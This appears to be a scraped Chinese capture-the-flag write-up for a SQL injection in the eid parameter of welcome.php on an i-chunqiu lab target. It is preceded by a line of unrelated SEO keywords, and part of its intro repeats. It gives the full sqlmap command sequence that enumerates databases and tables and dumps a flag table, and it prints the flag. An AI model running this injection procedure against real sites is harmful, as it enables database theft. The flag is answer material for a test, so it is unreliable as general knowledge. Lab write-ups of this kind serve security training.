成都网站logo设计,建立网站信息发布登记制度,网页设计师简介,网站策划用培训吗从CVE官网查询该漏洞相关信息
该漏洞是由于welcome.php中的eid参数包含了SQL注入漏洞
则我们的目标就在于寻找welcome.php地址以及相关的可注入eid参数 开启靶机
先在页面正常注册、登录一个账号。密码随便填 进入了home目录#xff0c;这里有三个话题可以选择开启
随便选…从CVE官网查询该漏洞相关信息
该漏洞是由于welcome.php中的eid参数包含了SQL注入漏洞
则我们的目标就在于寻找welcome.php地址以及相关的可注入eid参数 开启靶机
先在页面正常注册、登录一个账号。密码随便填 进入了home目录这里有三个话题可以选择开启
随便选择一个进行开启点击Start即可
进入后查看网页URL 可以看到这里的URL地址就出现了welcome.php和eid参数 使用自动化工具SQLMAP漏洞利用
爆库sqlmap -u http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141f1e8399en1t10 -p eid --batch --dbs 拿到了四个数据库继续选择ctf库进行爆表 爆表sqlmap -u http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141f1e8399en1t10 -p eid --batch -D ctf --tables 再继续爆列sqlmap -u http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141f1e8399en1t10 -p eid --batch -D ctf -T flag --columns 最后查看flag里面的内容 sqlmap -u http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141f1e8399en1t10 -p eid --batch -D ctf -T flag -C flag --dump flag{3b46abc2-3846-417c-84ae-49b54dfdeb7b}